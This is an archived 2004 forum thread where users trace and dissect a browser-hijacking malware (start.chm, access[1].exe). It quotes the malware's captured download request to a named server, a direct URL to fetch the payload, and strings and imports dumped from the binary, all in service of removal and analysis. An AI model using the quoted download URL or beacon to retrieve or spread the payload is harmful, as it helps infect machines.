Had this? " mk:@MSITStore:C:\WINDOWS\start.chm::/start.html"

Discussion in 'privacy problems' started by DB123, Apr 25, 2004.

Thread Status:
Not open for further replies.
  1. DB123

    DB123 Guest

    TIBS? Start.chm? Access[1].exe?

    Hey all,

    Something isn't right here. I've been hit with that mkstore problem that auto-executes rubbish on your system. Except this one just won't go away.

    You know the problem I'm talking about, so let me get right to it. First, I think creating a write protected 0 byte start.chm file prevents the thing from "infecting" your machine, but not running access[1].exe - killing the access[1].exe task prevents it from coming back. Second, I've seen a new variant of this which runs a cmd.exe that takes 100% cpu - killing that solves the problem.

    In brief. I've run ad-aware, spybot and hijack this. I know what I'm doing and the hijack this output shows nothing unusual. I tried to procdump the exe and disassemble it, but all I got was a load of garbage. I haven't tried softice on it yet.

    Does anyone know exactly how to confirm whether this thing is still on my machines, or whether it's just coming back when I'm browsing sites? If I know it's not there then I can at least start from a "known good" point when hacking it apart.

    An observation... It seems to return shortly after I go to EBay, which is somewhat interesting. Also if you boot up, use the system normally but don't run IE, the spyware doesn't start which leads me to believe it's either some cleverly hidden browser hook (which I really doubt), it's a hidden task that waits for iexplore.exe to load (which is possible, if the footprint is small enough the process won't show up), or it's coming back when browsing to a website.

    Any help on confirming it's not on my system is appreciated. Then I'll attack this little POS with my trusty copy of wdasm... Rule #1 for whatever idiot wrote this, never annoy a coder.
     
  2. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
  3. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    If you mean the one posted at April 22nd, 2004, 04:47 AM by Unzy, titled

    "Re: CWS Variants
    start.chm / MSITStore (MasterSearch)

    A new type of CWS variant that uses an exploit to reset a user's homepage."

    That doesn't help much :). I don't have those browser pages set, and the thing keeps coming back.

    I'm just not convinced that by removing the chm, the .exe process and the pages it removes the spyware. It's coming back somehow, and unless Ebay or Yahoo are using it then it's got to be from the local machine.
     
  4. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    look at my edit saying about emptying temp files

    several hiajckers are using the exploit now not just master search
     
  5. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Nothing there except an interesting batch file that doesn't do anything...
     
  6. Grumble

    Grumble Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    185
    Location:
    the sunshine state
    Re: TIBS? Start.chm? Access[1].exe?

    Hey guest, I noticed that even with cwshredder & hjthis clean & no start.chm file present, the thing seems to do this: when any app initially connects to the internet, or any type of help file is accessed, shortly afterward an additional TCP connect is made under that process to an IP in Russia, which then closes quickly, you can't see it with netstat, I used Port Explorer to watch it and identify the IP (which is the same each time).

    I'm beginning to think it may be able to eventually download the new start.chm & registry crap after repeating this with virtually every process that connects to the net.

    Anyway, since I blocked the IP range 81.211.105.* from leaving my router & banned the IP range from incoming at my computer firewall, none of the start.chm or registry crap has reappeared (5 days now). The critter still trys to call home with each process that accesses the net, but it can't get out anymore. If you use a tool like Port Explorer you should be able to see it on your machine. Hope this helps.
     
  7. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Interesting, thanks for adding that.

    Next time it happens, can you try using FPORT on it? FPort maps network connections to processes & files, you can get it from Foundstone (http://www.foundstone.com/knowledge/proddesc/fport.html). That will tell you what is making the outgoing connection...
     
  8. tbyrnes

    tbyrnes Registered Member

    Joined:
    Apr 20, 2004
    Posts:
    15
    Re: TIBS? Start.chm? Access[1].exe?

    I think you guys might be on to something here. I've had the same inability to completly remove this virus. I get everything cleaned up, and as soon as I reboot, Spyware Guard tells me something is trying to change my home page again. After reading this post, it hit me that this occurs right after my startup process starts something called NIS Time, which is a software tool to check/set the system time. This is the first time anything on my pc tries to go out over the net.

    I downloaded Fport and tried running it. I get the following results:


    FPort v2.0 - TCP/IP Process to Port Mapper
    Copyright 2000 by Foundstone, Inc.
    http://www.foundstone.com

    Pid Process Port Proto Path
    284 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
    4 System -> 139 TCP
    4 System -> 445 TCP
    992 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
    4 System -> 1026 TCP
    1660 Explorer -> 1355 TCP C:\WINDOWS\Explorer.EXE
    1624 -> 5000 TCP
    3084 aim -> 5180 TCP C:\Program Files\AIM95\aim.exe

    0 System -> 123 UDP
    0 System -> 137 UDP
    0 System -> 138 UDP
    284 svchost -> 445 UDP C:\WINDOWS\system32\svchost.exe
    4 System -> 1027 UDP
    1660 Explorer -> 1032 UDP C:\WINDOWS\Explorer.EXE
    1624 -> 1100 UDP
    992 svchost -> 1148 UDP C:\WINDOWS\System32\svchost.exe
    0 System -> 1900 UDP
    3084 aim -> 1900 UDP C:\Program Files\AIM95\aim.exe

    What I'm not clear on is how I could use this tool to see what is trying to get to the russian ip address. Fprot seems to take a snapshot of port ownership. If something is grabbing a port to reach out to the russian ip, then almost immediately releases that port, how would this catch it? I'm wondering if I should download and try ZoneAlarm. If I recall, you can set that so anything that tries to access the net will get flagged and held up pending permission.

    Tim
     
  9. tbyrnes

    tbyrnes Registered Member

    Joined:
    Apr 20, 2004
    Posts:
    15
    Re: TIBS? Start.chm? Access[1].exe?

    Ok, I installed Zone Alarm and set it to require permissions before anything goes out over the internet. I disabled my NISTIME because of timing problems - it seemed to want to do its thing before ZoneAlarm was fully initialized. The following files requested access to the internet as part of start up processes:

    svchost.exe
    explorer.exe
    msbntray.exe

    The Spygware Guard message about my home page being changed popped up after I granted access for explorer.exe to use the net. I wonder if the virus is somehow attaching to that file?

    Tim
     
  10. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    explorer shouldn't need to access the net, you should block that with ZA

    the svchosts entries will need to access and msbntray will

    we know that a lot of the cws baddies attach to explorere that is why we had you run the pv looking for the dll that had attached itself
    and nothing was showing in your logs
     
  11. tbyrnes

    tbyrnes Registered Member

    Joined:
    Apr 20, 2004
    Posts:
    15
    Re: TIBS? Start.chm? Access[1].exe?

    Derek, which PV option was that? I think I was asked to use option 1 and option 7 at different points. Whichever is the right one, I'd like to try again if you don't mind since explorer.exe seems to want to talk to the internet.

    Thanks. Want me to post the results back over in my own thread?

    Tim
     
  12. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    either option 1 or 2 are the explorer & Internet explore dlls
    but if they didn't show last time, they aren't likely to show this time
     
  13. Grumble

    Grumble Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    185
    Location:
    the sunshine state
    Re: TIBS? Start.chm? Access[1].exe?

    I don't think you will see it with FPROT. PE shows real time events as they happen, and logs the events, second by second.

    The TCP connect happens, then exactly 21 seconds later it closes. The same process that made the net connection (for example, iexplore.exe) same PID, is the process that does the connect to the Russian IP but on another local port (looks like the next available port), and with 0.0.0.0 local address rather than 192.168.x.x

    If I have the Ruskie IP blocked from outgoing to the WAN at the router, the Ruskie port closes 21 seconds after it opens and thats all. If the Ruskie IP is not blocked from outgoing to the WAN, the Ruskie port closes 21 seconds after it opens, AND THEN for a few minutes the remote Ruskie IP port 80 will try some incoming connects to my computer (2 times on three different ports, then quit). The incoming attempts are blocked at my firewall and logged there since I've got the IP entered as an incoming banned IP.

    It's not only iexplore.exe connecting to the net that gets the Ruskie IP in action, but also other stuff like mcafee security center processes that connect to the net.

    I'm getting kinda blurry-eyed from looking at these logs & stuff now, but maybe I ought to run some kind of dll checks sometime and have the guys here check 'em out.
     
  14. ArcdEvilz

    ArcdEvilz Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    2
  15. Rakewell

    Rakewell Guest

    Re: TIBS? Start.chm? Access[1].exe?

    The same thing is happening to me. Since I created the readonly start.chm and start.html files, my browser isn't being hijacked anymore. But I'm still getting the access[1].exe files and the high-CPU cmd.exe's.

    I installed Port Explorer, and am seeing the same behaviour DB123 described -- namely, normal connections are followed by a connection to 81.211.105.70.

    With Port Explorer, I was able to see what was in those connections:

    GET /report/reportsync.php?cid=64446bc9-e268-4a54-8597-ec057ab4dcfc
    HTTP/1.1
    Accept: */*
    XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: main.tibssystems.com
    Connection: Keep-Alive

    This downloads access.exe, which gets stored in the cache and executed as access[1].exe.

    You can get the access.exe file by going directly to http://81.211.105.70/report/reportsync.php. Obviously, just save it. Can someone disassemble it and tell us what it's latching itself onto so that we can get rid of it once and for all?
     
  16. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    Re: TIBS? Start.chm? Access[1].exe?

    Can anyone get me a sample of the access[1].exe ?

    I think it holds the solution to this mystery.

    (Got plenty, thanks to all that submitted)
    Preferably zipped up, so it doesn't get intercepted by any AV-scanners.

    Regards,

    Pieter
     
    Last edited: Apr 27, 2004
  17. dempapa

    dempapa Registered Member

    Joined:
    Apr 23, 2004
    Posts:
    16
    Re: TIBS? Start.chm? Access[1].exe?

    I too have this hacker omy PC and have been frustrated because it's unknown how to remove all components and all suggested solutions are about hiding the symptoms rather than curing the disease.

    I don't want to take over tghis posting, just wanted to say that this is the most convincing posting I've seen in terms of finding a solution and wish you guys well.
     
  18. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Okay, I'm at work at the minute but wanted to add this.

    If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.

    The aim is to get the exe in a "virgin" state on disk to disassemble. Simply ripping it out of memory with procdump won't do this as the exe will by definition change its internal states as it executes.

    What we need to do is to find the launch point. When we know that, we can set a bpx (breakpoint in execution) in Softice, and find the first line of code of the exe. We then change that to a jmp esi, which puts it in an infinite loop. Then we can use procdump to get a virgin copy that can be disassembled. It's the same technique used to reverse engineer upx'd & compressed exe's.

    The post above about the php file is very promising. What's annoying is I patched hh.exe (the CHM file reader for Windows) to prompt whenever a CHM file was executed - it didn't warn me, but access[1].exe came back. So the comment I read elsewhere about preventing chm files from being launchable doesn't seem to hold true.

    Are there any other coders/reverse engineers/crackers here that can work with me on this?
     
  19. Gurth

    Gurth Registered Member

    Joined:
    Apr 26, 2004
    Posts:
    1
    Location:
    Midwest, USA
    Re: TIBS? Start.chm? Access[1].exe?

    I found 5 ACCESS[1].EXE-*.pf files in my c:\windows\prefetch dir that might help...

     
  20. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    this cws hijacker comes back normally and we are still working on ways to kill it off permanently
    what works for some doesn't work for others, but some get rid of it fairly easily

    a workaround seems to be install a good firewall, lists here http://www.wilders.org/firewalls.htm and block these ranges of ports, both incoming and outgoing 209.66.114.0-209.66.115.255 and 81.211.105.0-81.211.105.255
    that stops the known cws servers responding or the hidden files on your computer updating. This works sometimes but not always, but it's a help. The problem with this approach is that some good sites might also be blocked
    then
    kill it off using shredder etc and hjt as advised while disconnected from the net
     
  21. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Gurth, thanks for the offer but the -pf is junk. Rakewell got it in 1, download that with a dl manager (getright, flashget), rename it to an exe and it's a valid PE file.

    Here's a start, don't have much time right now but I'll set up a sandbox and start hitting this POS. It was coded with Visual C++ (VC6 I believe). Here's some interesting strings in the table (just look at the end of the line, the start is the offset and the type). THe worrying one is "wininet.dll", it might be patching it. My wininets are all the right size & date, so perhaps Windows FileProt fixed it for me...

    24672,Char,11,tibsystems.
    24684,Char,13,statsbank.com
    24700,Char,15,boards.cexx.org
    24716,Char,22,adultwebmasterinfo.com
    24740,Char,12,spywareinfo.
    24756,Char,15,dialerschutz.de
    24772,Char,18,webmasterworld.com
    24804,Char,18,go****yourself.com
    24824,Char,17,FindCloseUrlCache
    24844,Char,22,FindNextUrlCacheEntryA
    24868,Char,23,FindFirstUrlCacheEntryA
    24892,DLL,11,wininet.dll
    24970,Char,22,if exist %1 goto start
    25012,Char,41,SOFTWARE\Microsoft\Internet Explorer\Main
    25056,Char,10,Start Page
    25068,Char,13,::/start.html
    25084,Char,14,mk:mad:MSITStore:
    25100,Char,10,\start.chm
    37287,Char,11,/$FIftiMain
    37318,Char,15,/arrow_left.gif
    37340,Char,16,/arrow_right.gif
    37363,Char,13,/ham01000.jpg
    37383,Char,13,/ham01001.jpg
    37403,Char,13,/ham01100.jpg
    37423,Char,13,/ham01200.jpg
    37443,Char,13,/ham01300.jpg
    37463,Char,13,/ham01400.jpg
    37483,Char,13,/ham01500.jpg
    37503,Char,13,/ham01600.jpg
    37523,Char,13,/ham01700.jpg
    37543,Char,13,/ham01800.jpg
    37563,Char,13,/ham01900.jpg
    37583,Char,13,/ham02000.jpg
    37603,Char,13,/ham02001.jpg
    37623,Char,13,/ham02100.jpg
    37643,Char,13,/ham02200.jpg
    37663,Char,13,/ham03000.jpg
    37683,Char,13,/ham04000.jpg
    37703,Char,13,/ham05000.jpg
    37723,Char,13,/ham06000.jpg
    37743,Char,13,/ham07000.jpg
    37763,Char,13,/ham08000.jpg
    37783,Char,13,/ham09000.jpg
    37818,Char,13,/mo000000.jpg
    37853,Char,12,/poker_t.gif
    37872,Char,11,/start.html
    37889,Char,13,/sto00000.gif
    37909,Char,13,/to000000.jpg
    37929,Char,20,::DataSpace/NameList
    37951,Char,42,<:):DataSpace/Storage/MSCompressed/Content
    37998,Char,46,P,::DataSpace/Storage/MSCompressed/ControlData
    38047,Char,42,)::DataSpace/Storage/MSCompressed/SpanInfo
    38092,Char,48,/::DataSpace/Storage/MSCompressed/Transform/List
    38141,Char,98,<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
    38242,Char,106,i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
    41266,Unichar,12,Uncompressed
    41294,Unichar,12,MSCompressed
    41320,Unichar,19,{7FC28940-9D31-11D0
    41474,Char,21,HHA Version 4.74.8702
    41540,Char,10,start.html
    70070,Char,10,vs3+:D)&Op
    83737,Char,11,S7K$Lj9SVlX


    Here are the interesting imports:

    22006,Function,11,FreeLibrary
    22020,Function,14,GetProcAddress
    22038,Function,12,LoadLibraryA
    22066,Function,14,FindFirstFileA
    22096,Function,12,GetTickCount
    22124,Function,12,GetTempPathA
    22140,Function,23,GetEnvironmentVariableA
    22166,Function,18,GetModuleFileNameA
    22200,Function,11,CloseHandle
    22226,Function,11,CreateFileA
    22240,Function,12,LockResource
    22256,Function,12,LoadResource
    22272,Function,13,FindResourceA
    22296,Function,14,SizeofResource
    22326,Function,14,GetProcessHeap
    22354,DLL,12,KERNEL32.dll
    22370,Function,21,GetKeyboardLayoutList
    22392,DLL,10,USER32.dll
    22406,Function,11,RegCloseKey
    22420,Function,14,RegSetValueExA
    22438,Function,13,RegOpenKeyExA
    22452,DLL,12,ADVAPI32.dll
    22468,Function,13,ShellExecuteA
    22482,DLL,11,SHELL32.dll
    22496,Function,16,GetModuleHandleA
    22516,Function,15,GetStartupInfoA
    22534,Function,15,GetCommandLineA
    22552,Function,10,GetVersion
    22566,Function,11,ExitProcess
    22580,Function,16,TerminateProcess
    22600,Function,17,GetCurrentProcess
    22620,Function,24,UnhandledExceptionFilter
    22648,Function,23,FreeEnvironmentStringsA
    22674,Function,23,FreeEnvironmentStringsW
    22700,Function,19,WideCharToMultiByte
    22722,Function,21,GetEnvironmentStrings
    22746,Function,22,GetEnvironmentStringsW
    22772,Function,14,SetHandleCount
    22790,Function,12,GetStdHandle
    22806,Function,11,GetFileType
    22820,Function,13,GetVersionExA
    22836,Function,11,HeapDestroy
    22850,Function,10,HeapCreate
    22864,Function,11,VirtualFree
    22890,Function,12,VirtualAlloc
    22906,Function,11,HeapReAlloc
    22954,Function,19,MultiByteToWideChar
    22976,Function,12,LCMapStringA
    22992,Function,12,LCMapStringW
    23008,Function,14,GetStringTypeA
    23026,Function,14,GetStringTypeW
     
    Last edited by a moderator: Apr 26, 2004
  22. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Okay, I'm convinced we're missing something. The only sites I've been to have been known-good ones. So unless this site, Ebay, yahoo or NukeCops are causing this spyware to be downloaded, it's still on my machine.

    Anyone got any ideas? There's no point disasm'ing this thing if I can't get it cleaned...
     
  23. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Another possibility. I think EBay may be involved. I tracked down the copy of Access[1].exe to the exact time I was logged into my ebay UK account. In Ebay UK "My Account", there is a banner advert top-center of the page - I'm wondering if one of the adverts they show is causing this hijack.

    Incidentally you won't be able to find the exe in the IE cache/history, you'll have to reboot and delete everything in your profile/local settings/temporary internet files from a cmd prompt or non-Explorer tool (such as DOpus).

    Can anyone with an EBay UK account keep an eye out and see if they see anything similar?
     
  24. dempapa

    dempapa Registered Member

    Joined:
    Apr 23, 2004
    Posts:
    16
    Re: TIBS? Start.chm? Access[1].exe?

    It's nothing specific to eBay.

    The hacker waits until you connect to the internet then downloads it stuff. If you make a connection using say Outlook hooked up to your hotmail account you'll experience the same problem.

    Read around and look at the many other postings on this virus and you'll see what people are discovering about this new pest.
     
  25. Rakewell

    Rakewell Guest

    Re: TIBS? Start.chm? Access[1].exe?

    It could be anything. Maybe a banner that eBay is displaying, or maybe something in a person's ad. I don't know.

    What concerns me more is the possibility that the infection (the part that makes IE go pull down that php file) comes from a difference source, and access[1].exe doesn't actually infect machines. In which case, reverse engineering access[1].exe won't tell us how to make IE stop pulling it down.

    Maybe all access[1].exe does is pop up the $3.5 million lottery window via cmd.exe? (I've always killed cmd.exe to get rid of that popup, so I don't know what happens when you click either button.)

    Actually, what you posted doesn't include the string about $3.5M, but it was in another post here where someone posted their results of disassembling access.exe. I wonder if there are multiple versions or if it mutates? What's the md5 hash one the version you've got? (I'm not sure how to get the hash in plain Windows. I've got cygwin and it includes md5sum.)

    The hash on the version I have is: f56b2442dcd2f553b2fdd060c00bf99e
     
Thread Status:
Not open for further replies.